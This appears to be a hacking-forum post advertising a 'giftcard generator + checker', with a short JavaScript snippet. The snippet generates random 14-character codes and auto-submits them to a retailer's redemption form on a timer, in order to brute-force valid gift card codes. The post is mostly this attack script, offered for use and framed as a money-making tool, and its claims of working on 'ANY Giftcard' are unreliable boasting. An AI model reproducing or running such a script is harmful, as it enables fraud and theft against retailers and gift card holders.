Yhopa
Punchline Machine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
GIFTCARD GENERATOR + CHECKER
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
*NO DOWNLOAD*
*REALLY HIGH CPM*
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
*NO DOWNLOAD*
*REALLY HIGH CPM*
Code:
var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
function makeid() {
var text = "";
var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC*
for (var i = 0; i < 14; i++) //change the value depending on the length of the giftcard code
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}
function main() {
document.getElementById("INPUTBOXNAME").value = makeid(); //you can change the element depending on the site
document.getElementById("SUBMITBUTTONNAME").click();
}
setInterval(function() {
main();
}, speed);